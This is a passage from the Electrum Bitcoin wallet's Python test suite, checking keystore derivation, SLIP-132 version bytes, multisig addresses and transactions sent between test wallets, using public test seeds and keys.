self.assertEqual(w.get_receiving_addresses()[0], 'bc1qcr8te4kr609gcawutmrza0j4xv80jy8z306fyu')
self.assertEqual(w.get_change_addresses()[0], 'bc1q8c6fshw2dlwun7ekn9qwf37cu2rn755upcp6el')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_multisig_seed_standard(self, mock_write):
seed_words = 'blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure'
self.assertEqual(bitcoin.seed_type(seed_words), 'standard')
ks1 = keystore.from_seed(seed_words, '', True)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9s21ZrQH143K3t9vo23J3hajRbzvkRLJ6Y1zFrUFAfU3t8oooMPfb7f87cn5KntgqZs5nipZkCiBFo5ZtaSD2eDo7j7CMuFV8Zu6GYLTpY6')
self.assertEqual(ks1.xpub, 'xpub661MyMwAqRbcGNEPu3aJQqXTydqR9t49Tkwb4Esrj112kw8xLthv8uybxvaki4Ygt9xiwZUQGeFTG7T2TUzR3eA4Zp3aq5RXsABHFBUrq4c')
# electrum seed: ghost into match ivory badge robot record tackle radar elbow traffic loud
ks2 = keystore.from_xpub('xpub661MyMwAqRbcGfCPEkkyo5WmcrhTq8mi3xuBS7VEZ3LYvsgY1cCFDbenT33bdD12axvrmXhuX3xkAbKci3yZY9ZEk8vhLic7KNhLjqdh5ec')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '32ji3QkAgXNz6oFoRfakyD3ys1XXiERQYN')
self.assertEqual(w.get_change_addresses()[0], '36XWwEHrrVCLnhjK5MrVVGmUHghr9oWTN1')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_multisig_seed_segwit(self, mock_write):
seed_words = 'snow nest raise royal more walk demise rotate smooth spirit canyon gun'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks1 = keystore.from_seed(seed_words, '', True)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'ZprvAjxLRqPiDfPDxXrm8JvcoCGRAW6xUtktucG6AMtdzaEbTEJN8qcECvujfhtDU3jLJ9g3Dr3Gz5m1ypfMs8iSUh62gWyHZ73bYLRWyeHf6y4')
self.assertEqual(ks1.xpub, 'Zpub6xwgqLvc42wXB1wEELTdALD9iXwStMUkGqBgxkJFYumaL2dWgNvUkjEDWyDFZD3fZuDWDzd1KQJ4NwVHS7hs6H6QkpNYSShfNiUZsgMdtNg')
# electrum seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
ks2 = keystore.from_xpub('Zpub6y4oYeETXAbzLNg45wcFDGwEG3vpgsyMJybiAfi2pJtNF3i3fJVxK2BeZJaw7VeKZm192QHvXP3uHDNpNmNDbQft9FiMzkKUhNXQafUMYUY')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qvzezdcv6vs5h45ugkavp896e0nde5c5lg5h0fwe2xyfhnpkxq6gq7pnwlc')
self.assertEqual(w.get_change_addresses()[0], 'bc1qxqf840dqswcmu7a8v82fj6ej0msx08flvuy6kngr7axstjcaq6us9hrehd')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_bip45_standard(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks1 = keystore.from_bip39_seed(seed_words, '', "m/45'/0")
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9vyEFyXf7pYVv4eDU3hhuCEAHPHNGuxX73nwtYdpbLcqwJCPwFKknAK8pHWuHHBirCzAPDZ7UJHrYdhLfn1NkGp9rk3rVz2aEqrT93qKRD9')
self.assertEqual(ks1.xpub, 'xpub69xafV4YxC6o8Yiga5EiGLAtqR7rgNgNUGiYgw3S9g9pp6XYUne1KxdcfYtxwmA3eBrzMFuYcNQKfqsXCygCo4GxQFHfywxpUbKNfYvGJka')
# bip39 seed: tray machine cook badge night page project uncover ritual toward person enact
# der: m/45'/0
ks2 = keystore.from_xpub('xpub6B26nSWddbWv7J3qQn9FbwPPQktSBdPQfLfHhRK4375QoZq8fvM8rQey1koGSTxC5xVoMzNMaBETMUmCqmXzjc8HyAbN7LqrvE4ovGRwNGg')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '3JPTQ2nitVxXBJ1yhMeDwH6q417UifE3bN')
self.assertEqual(w.get_change_addresses()[0], '3FGyDuxgUDn2pSZe5xAJH1yUwSdhzDMyEE')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_p2sh_segwit(self, mock_write):
# bip39 seed: pulse mixture jazz invite dune enrich minor weapon mosquito flight fly vapor
# der: m/49'/0'/0'
# NOTE: there is currently no bip43 standard derivation path for p2wsh-p2sh
ks1 = keystore.from_xprv('YprvAUXFReVvDjrPerocC3FxVH748sJUTvYjkAhtKop5VnnzVzMEHr1CHrYQKZwfJn1As3X4LYMav6upxd5nDiLb6SCjRZrBH76EFvyQAG4cn79')
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xpub, 'Ypub6hWbqA2p47QgsLt5J4nxrR3ngu8xsPGb7PdV8CDh48KyNngNqPKSqertAqYhQ4umELu1UsZUCYfj9XPA6AdSMZWDZQobwF7EJ8uNrECaZg1')
# bip39 seed: slab mixture skin evoke harsh tattoo rare crew sphere extend balcony frost
# der: m/49'/0'/0'
ks2 = keystore.from_xpub('Ypub6iNDhL4WWq5kFZcdFqHHwX4YTH4rYGp8xbndpRrY7WNZFFRfogSrL7wRTajmVHgR46AT1cqUG1mrcRd7h1WXwBsgX2QvT3zFbBCDiSDLkau')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35LeC45QgCVeRor1tJD6LiDgPbybBXisns')
self.assertEqual(w.get_change_addresses()[0], '39RhtDchc6igmx5tyoimhojFL1ZbQBrXa6')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip32_extended_version_bytes(self, mock_write):
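        # One seed, every SLIP-132 version-byte family: the same master key is
        # serialized as xprv/xpub, yprv/ypub, zprv/zpub for standard wallets and
        # as xprv, Yprv/Ypub, Zprv/Zpub for multisig, and the first receiving and
        # change addresses are checked for each script type.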
seed_words = 'crouch dumb relax small truck age shine pink invite spatial object tenant'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
bip32_seed = keystore.bip39_to_seed(seed_words, '')
self.assertEqual('0df68c16e522eea9c1d8e090cfb2139c3b3a2abed78cbcb3e20be2c29185d3b8df4e8ce4e52a1206a688aeb88bfee249585b41a7444673d1f16c0d45755fa8b9',
bh2u(bip32_seed))
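        # helper: build a keystore directly from the raw BIP32 seed at the root
        # path, so every xtype below derives from identical entropy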
def create_keystore_from_bip32seed(xtype):
ks = keystore.BIP32_KeyStore({})
ks.add_xprv_from_seed(bip32_seed, xtype=xtype, derivation='m/')
return ks
ks = create_keystore_from_bip32seed(xtype='standard')
self.assertEqual('033a05ec7ae9a9833b0696eb285a762f17379fa208b3dc28df1c501cf84fe415d0', ks.derive_pubkey(0, 0))
self.assertEqual('02bf27f41683d84183e4e930e66d64fc8af5508b4b5bf3c473c505e4dbddaeed80', ks.derive_pubkey(1, 0))
ks = create_keystore_from_bip32seed(xtype='standard') # p2pkh
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K3nyWMZVjzGL4KKAE1zahmhTHuV5pdw4eK3o3igC5QywgQG7UTRe6TGBniPDpPFWzXMeMUFbBj8uYsfXGjyMmF54wdNt8QBm')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcGH3yTb2kMQGnsLziRTJZ8vNthsVSCGbdBr8CGDWKxnGAFYgyKTzBtwvPPmfVAWJuFmxRXjSbUTg87wDkWQ5GmzpfUcN9t8Z')
self.assertEqual(w.get_receiving_addresses()[0], '19fWEVaXqgJFFn7JYNr6ouxyjZy3uK7CdK')
self.assertEqual(w.get_change_addresses()[0], '1EEX7da31qndYyeKdbM665w1ze5gbkkAZZ')
ks = create_keystore_from_bip32seed(xtype='p2wpkh-p2sh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'yprvABrGsX5C9janu6AdBvHNCMRZVHJfxcaCgoyWgsyi1wSXN9cGyLMe33bpRU54TLJ1ruJbTrpNqusYQeFvBx1CXNb9k1DhKtBFWo8b1sLbXhN')
self.assertEqual(ks.xpub, 'ypub6QqdH2c5z7967aF6HwpNZVNJ3K9AN5J442u7VGPKaGyWEwwRWsftaqvJGkeZKNe7Jb3C9FG3dAfT94ZzFRrcGhMizGvB6Jtm3itJsEFhxMC')
self.assertEqual(w.get_receiving_addresses()[0], '34SAT5gGF5UaBhhSZ8qEuuxYvZ2cm7Zi23')
self.assertEqual(w.get_change_addresses()[0], '38unULZaetSGSKvDx7Krukh8zm8NQnxGiA')
ks = create_keystore_from_bip32seed(xtype='p2wpkh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'zprvAWgYBBk7JR8GkPMk2H4zQSX4fFT7uEZhbvVjUGsbPwpQRFRWDzXCf7FxSg2eTEwwGYRQDLQwJaE6HvsUueRDKcGkcLv7unzjnXCEQVWhrF9')
self.assertEqual(ks.xpub, 'zpub6jftahH18ngZxsSD8JbzmaToDHHcJhHYy9RLGfHCxHMPJ3kemXqTCuaSHxc9KHJ2iE9ztirc5q212MBYy8Gd4w3KrccbgDiFKSwxFpYKEH6')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qtuynwzd0d6wptvyqmc6ehkm70zcamxpshyzu5e')
self.assertEqual(w.get_change_addresses()[0], 'bc1qjy5zunxh6hjysele86qqywfa437z4xwmleq8wk')
ks = create_keystore_from_bip32seed(xtype='standard') # p2sh
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K3nyWMZVjzGL4KKAE1zahmhTHuV5pdw4eK3o3igC5QywgQG7UTRe6TGBniPDpPFWzXMeMUFbBj8uYsfXGjyMmF54wdNt8QBm')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcGH3yTb2kMQGnsLziRTJZ8vNthsVSCGbdBr8CGDWKxnGAFYgyKTzBtwvPPmfVAWJuFmxRXjSbUTg87wDkWQ5GmzpfUcN9t8Z')
self.assertEqual(w.get_receiving_addresses()[0], '3F4nm8Vunb7mxVvqhUP238PYge2hpU5qYv')
self.assertEqual(w.get_change_addresses()[0], '3N8jvKGmxzVHENn6B4zTdZt3N9bmRKjj96')
ks = create_keystore_from_bip32seed(xtype='p2wsh-p2sh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'YprvANkMzkodih9AKfL18akM2RmND5LwAyFo15dBc9FFPiGvzLBBjjjv8ATkEB2Y1mWv6NNaLSpVj8G3XosgVBA9frhpaUL6jHeFQXQTbqVPcv2')
self.assertEqual(ks.xpub, 'Ypub6bjiQGLXZ4hTY9QUEcHMPZi6m7BRaRyeNJYnQXerx3ous8WLHH4AfxnE5Tc2sos1Y47B1qGAWP3xGEBkYf1ZRBUPpk2aViMkwTABT6qoiBb')
self.assertEqual(w.get_receiving_addresses()[0], '3L1BxLLASGKE3DR1ruraWm3hZshGCKqcJx')
self.assertEqual(w.get_change_addresses()[0], '3NDGcbZVXTpaQWRhiuVPpXsNt4g2JiCX4E')
ks = create_keystore_from_bip32seed(xtype='p2wsh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'ZprvAhadJRUYsNgeAxX7xwXyEWrsP3VP7bFHvC9QPY98miep3RzQzPuUkE7tFNz81gAqW1VP5vR4BncbR6VFCsaAU6PRSp2XKCTjgFU6zRpk6Xp')
self.assertEqual(ks.xpub, 'Zpub6vZyhw1ShkEwPSbb4y4ybeobw5KsX3y9HR51BvYkL4BnvEKZXwDjJ2SN6fZcsiWvwhDymJriy3QW9WoKGMRaDR9zh5j15dBFDBDpqjK1ekQ')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1q84x0yrztvcjg88qef4d6978zccxulcmc9y88xcg4ghjdau999x7q7zv2qe')
self.assertEqual(w.get_change_addresses()[0], 'bc1q0fj5mra96hhnum80kllklc52zqn6kppt3hyzr49yhr3ecr42z3tsrkg3gs')
class TestWalletKeystoreAddressIntegrityForTestnet(TestCaseForTestnet):
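    # Testnet counterpart of the mainnet integrity checks above: the same kinds
    # of keystores, but serialized with testnet version bytes (tprv/uprv/vprv
    # and their multisig/public variants) and testnet address prefixes.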
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_p2sh_segwit_testnet(self, mock_write):
# bip39 seed: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose
# der: m/49'/1'/0'
# NOTE: there is currently no bip43 standard derivation path for p2wsh-p2sh
ks1 = keystore.from_xprv('Uprv9BEixD3As2LK5h6G2SNT3cTqbZpsWYPceKTSuVAm1yuSybxSvQz2MV1o8cHTtctQmj4HAenb3eh5YJv4YRZjv35i8fofVnNbs4Dd2B4i5je')
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xpub, 'Upub5QE5Mia4hPtcJBAj8TuTQkQa9bfMv17U1YP3hsaNaKSRrQHbTxJGuHLGyv3MbKZixuPyjfXGUdbTjE4KwyFcX8YD7PX5ybTDbP11UT8UpZR')
# bip39 seed: square page wood spy oil story rebel give milk screen slide shuffle
# der: m/49'/1'/0'
ks2 = keystore.from_xpub('Upub5QRzUGRJuWJe5MxGzwgQAeyJjzcdGTXkkq77w6EfBkCyf5iWppSaZ4caY2MgWcU9LP4a4uE5apUFN4wLoENoe9tpu26mrUxeGsH84dN3JFh')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '2MzsfTfTGomPRne6TkctMmoDj6LwmVkDrMt')
self.assertEqual(w.get_change_addresses()[0], '2NFp9w8tbYYP9Ze2xQpeYBJQjx3gbXymHX7')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip32_extended_version_bytes(self, mock_write):
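        # same seed as the mainnet version of this test; only the extended-key
        # version bytes and the address prefixes differ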
seed_words = 'crouch dumb relax small truck age shine pink invite spatial object tenant'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
bip32_seed = keystore.bip39_to_seed(seed_words, '')
self.assertEqual('0df68c16e522eea9c1d8e090cfb2139c3b3a2abed78cbcb3e20be2c29185d3b8df4e8ce4e52a1206a688aeb88bfee249585b41a7444673d1f16c0d45755fa8b9',
bh2u(bip32_seed))
def create_keystore_from_bip32seed(xtype):
ks = keystore.BIP32_KeyStore({})
ks.add_xprv_from_seed(bip32_seed, xtype=xtype, derivation='m/')
return ks
ks = create_keystore_from_bip32seed(xtype='standard')
self.assertEqual('033a05ec7ae9a9833b0696eb285a762f17379fa208b3dc28df1c501cf84fe415d0', ks.derive_pubkey(0, 0))
self.assertEqual('02bf27f41683d84183e4e930e66d64fc8af5508b4b5bf3c473c505e4dbddaeed80', ks.derive_pubkey(1, 0))
ks = create_keystore_from_bip32seed(xtype='standard') # p2pkh
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'tprv8ZgxMBicQKsPecD328MF9ux3dSaSFWci7FNQmuWH7uZ86eY8i3XpvjK8KSH8To2QphiZiUqaYc6nzDC6bTw8YCB9QJjaQL5pAApN4z7vh2B')
self.assertEqual(ks.xpub, 'tpubD6NzVbkrYhZ4Y5Epun1qZKcACU6NQqocgYyC4RYaYBMWw8nuLSMR7DvzVamkqxwRgrTJ1MBMhc8wwxT2vbHqMu8RBXy4BvjWMxR5EdZroxE')
self.assertEqual(w.get_receiving_addresses()[0], 'mpBTXYfWehjW2tavFwpUdqBJbZZkup13k2')
self.assertEqual(w.get_change_addresses()[0], 'mtkUQgf1psDtL67wMAKTv19LrdgPWy6GDQ')
ks = create_keystore_from_bip32seed(xtype='p2wpkh-p2sh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'uprv8tXDerPXZ1QsVuQ9rV8sN13YoQitC8cD2MtdZJQAVuw19kMMxhhPYnyGLeEiThgLELqNTxS91GTLsVofKAM9LRrkGeRzzEuJRtt1Tcostr7')
self.assertEqual(ks.xpub, 'upub57Wa4MvRPNyAiPUcxWfsj8zHMSZNbbL4PapEMgon4FTz2YgWWF1e6bHkBvpDKk2Rg2Zy9LsonXFFbv7jNeCZ5kdKWv8UkfcoxpdjJrZuBX6')
self.assertEqual(w.get_receiving_addresses()[0], '2MuzNWpcHrXyvPVKzEGT7Xrwp8uEnXXjWnK')
self.assertEqual(w.get_change_addresses()[0], '2MzTzY5VcGLwce7YmdEwjXhgQD7LYEKLJTm')
ks = create_keystore_from_bip32seed(xtype='p2wpkh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'vprv9DMUxX4ShgxMMCbGgqvVa693yNsL8kbhwUQrLhJ3svJtCrAbDMrxArdQMrCJTcLFdyxBDS2hTvotknRE2rmA8fYM8z8Ra9inhcwerEsG6Ev')
self.assertEqual(ks.xpub, 'vpub5SLqN2bLY4WeZgfjnsTVwE5nXQhpYDKZJhLT95hfSFqs5eVjkuBCiewtD8moKegM5fgmtpUNFBboVCjJ6LcZszJvPFpuLaSJEYhNhUAnrCS')
self.assertEqual(w.get_receiving_addresses()[0], 'tb1qtuynwzd0d6wptvyqmc6ehkm70zcamxpsaze002')
self.assertEqual(w.get_change_addresses()[0], 'tb1qjy5zunxh6hjysele86qqywfa437z4xwm4lm549')
ks = create_keystore_from_bip32seed(xtype='standard') # p2sh
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'tprv8ZgxMBicQKsPecD328MF9ux3dSaSFWci7FNQmuWH7uZ86eY8i3XpvjK8KSH8To2QphiZiUqaYc6nzDC6bTw8YCB9QJjaQL5pAApN4z7vh2B')
self.assertEqual(ks.xpub, 'tpubD6NzVbkrYhZ4Y5Epun1qZKcACU6NQqocgYyC4RYaYBMWw8nuLSMR7DvzVamkqxwRgrTJ1MBMhc8wwxT2vbHqMu8RBXy4BvjWMxR5EdZroxE')
self.assertEqual(w.get_receiving_addresses()[0], '2N6czpsRwQ3d8AHZPNbztf5NotzEsaZmVQ8')
self.assertEqual(w.get_change_addresses()[0], '2NDgwz4CoaSzdSAQdrCcLFWsJaVowCNgiPA')
ks = create_keystore_from_bip32seed(xtype='p2wsh-p2sh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'Uprv95RJn67y7xyEvUZXo9brC5PMXCm9QVHoLdYJUZfhsgmQmvvGj75fduqC9MCC28uETouMLYSFtUqqzfRRcPW6UuyR77YQPeNJKd9t3XutF8b')
self.assertEqual(ks.xpub, 'Upub5JQfBberxLXY8xdzuB8rZDL65Ebdox1ehrTuGx5KS2JPejFRGePvBi9fzdmgtBFKuVdx1vsvfjdkj5jVfsMWEEjzMPEtA55orYubtrCZmRr')
self.assertEqual(w.get_receiving_addresses()[0], '2NBZQ25GC3ipaF13ZY3UT8i2xnDuS17pJqx')
self.assertEqual(w.get_change_addresses()[0], '2NDmUgLVX8vKvcJ4FQ37GSUre6QtBzKkb6k')
ks = create_keystore_from_bip32seed(xtype='p2wsh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'Vprv16YtLrHXxePM6noKqtFtMtmUgBE9bEpF3fPLmpvuPksssLostujtdHBwqhEeVuzESz22UY8hyPx9ed684SQpCmUKSVhpxPFbvVNY7qnviNR')
self.assertEqual(ks.xpub, 'Vpub5dEvVGKn7251zFq7jXvUmJRbFCk5ka19cxz84LyCp2gGhq4eXJZUomop1qjGt5uFK8kkmQUV8PzJcNM4PZmX2URbDiwJjyuJ8GyFHRrEmmG')
self.assertEqual(w.get_receiving_addresses()[0], 'tb1q84x0yrztvcjg88qef4d6978zccxulcmc9y88xcg4ghjdau999x7qf2696k')
self.assertEqual(w.get_change_addresses()[0], 'tb1q0fj5mra96hhnum80kllklc52zqn6kppt3hyzr49yhr3ecr42z3ts5777jl')
class TestWalletSending(TestCaseForTestnet):
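    # End-to-end spend tests: wallets are bootstrapped with hard-coded funding
    # transactions, then send to each other, and the resulting raw transactions,
    # txids/wtxids and balances are compared against fixed expected values.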
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.electrum_path = tempfile.mkdtemp()
cls.config = SimpleConfig({'electrum_path': cls.electrum_path})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.electrum_path)
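    # helper: a fresh standard wallet from an Electrum seed, with a small gap
    # limit to keep address derivation cheap in tests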
def create_standard_wallet_from_seed(self, seed_words):
ks = keystore.from_seed(seed_words, '', False)
return WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=2)
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2wpkh_and_compressed_p2pkh(self, mock_write):
wallet1 = self.create_standard_wallet_from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver')
wallet2 = self.create_standard_wallet_from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song')
# bootstrap wallet1
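        # (hand the wallet a raw funding tx via the callback, as if the network
        # had just announced it, so the wallet has a spendable UTXO)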
funding_tx = Transaction('01000000014576dacce264c24d81887642b726f5d64aa7825b21b350c7b75a57f337da6845010000006b483045022100a3f8b6155c71a98ad9986edd6161b20d24fad99b6463c23b463856c0ee54826d02200f606017fd987696ebbe5200daedde922eee264325a184d5bbda965ba5160821012102e5c473c051dae31043c335266d0ef89c1daab2f34d885cc7706b267f3269c609ffffffff0240420f00000000001600148a28bddb7f61864bdcf58b2ad13d5aeb3abc3c42a2ddb90e000000001976a914c384950342cb6f8df55175b48586838b03130fad88ac00000000')
funding_txid = funding_tx.txid()
funding_output_value = 1000000
self.assertEqual('add2535aedcbb5ba79cc2260868bb9e57f328738ca192937f2c92e0e94c19203', funding_txid)
wallet1.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 250000)]
tx = wallet1.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1.is_mine(wallet1.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('010000000001010392c1940e2ec9f2372919ca3887327fe5b98b866022cc79bab5cbed5a53d2ad0000000000feffffff0290d00300000000001976a914ea7804a2c266063572cc009a63dc25dcc0e9d9b588ac285e0b0000000000160014690b59a8140602fb23cc2904ece9cc4daf361052024730440220608a5339ca894592da82119e1e4a1d09335d70a552c683687223b8ed724465e902201b3f0feccf391b1b6257e4b18970ae57d7ca060af2dae519b3690baad2b2a34e0121030faee9b4a25b7db82023ca989192712cdd4cb53d3d9338591c7909e581ae1c0c00000000',
str(tx_copy))
self.assertEqual('3c06ae4d9be8226a472b3e7f7c127c7e3016f525d658d26106b80b4c7e3228e2', tx_copy.txid())
self.assertEqual('d8d930ae91dce73118c3fffabbdfcfb87f5d91673fb4c7dfd0fbe7cf03bf426b', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
        wallet1.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)  # strictly TX_HEIGHT_UNCONF_PARENT, but the distinction does not matter for this test
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1.get_receiving_address(), 100000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000001e228327e4c0bb80661d258d625f516307e7c127c7f3e2b476a22e89b4dae063c000000006b483045022100d3895b31e7c9766987c6f53794c7394f534f4acecefda5479d963236f9703d0b022026dd4e40700ceb788f136faf54bf85b966648dc7c2a608d8110604f2d22d59070121030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cffeffffff02a0860100000000001600148a28bddb7f61864bdcf58b2ad13d5aeb3abc3c4268360200000000001976a914ca4c60999c46c2108326590b125aefd476dcb11888ac00000000',
str(tx_copy))
self.assertEqual('5f25707571eb776bdf14142f9966bf2a681906e0a79501edbb99a972c2ceb972', tx_copy.txid())
self.assertEqual('5f25707571eb776bdf14142f9966bf2a681906e0a79501edbb99a972c2ceb972', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 250000 - 5000 + 100000, 0), wallet1.get_balance())
self.assertEqual((0, 250000 - 5000 - 100000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2sh_2of3_and_uncompressed_p2pkh(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4XJzYkhsCbDCcZRmDAKSD7bXi9mdCni7acVt45fxbTVZyU6jRGh29ULKTjoapkfFsSJvQHitcVKbQgzgkkYsAmaovcro7Mhf')
],
'2of3', gap_limit=2
)
wallet1b = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4YARFMEZPckrqJkw59GZD1PXtQnw14ukvWDofR7Z1HMeSCxfYEZVvg4VdZ8zGok5VxHwdrLqew5cMdQntWc5mT7mh1CSgrnX')
],
'2of3', gap_limit=2
)
# ^ third seed: ghost into match ivory badge robot record tackle radar elbow traffic loud
wallet2 = self.create_standard_wallet_from_seed('powerful random nobody notice nothing important anyway look away hidden message over')
# bootstrap wallet1
funding_tx = Transaction('010000000001014121f99dc02f0364d2dab3d08905ff4c36fc76c55437fd90b769c35cc18618280100000000fdffffff02d4c22d00000000001600143fd1bc5d32245850c8cb5be5b09c73ccbb9a0f75001bb7000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887024830450221008781c78df0c9d4b5ea057333195d5d76bc29494d773f14fa80e27d2f288b2c360220762531614799b6f0fb8d539b18cb5232ab4253dd4385435157b28a44ff63810d0121033de77d21926e09efd04047ae2d39dbd3fb9db446e8b7ed53e0f70f9c9478f735dac11300')
funding_txid = funding_tx.txid()
funding_output_value = 12000000
self.assertEqual('b25cd55687c9e528c2cfd546054f35fb6741f7cf32d600f07dfecdf2e1d42071', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 370000)]
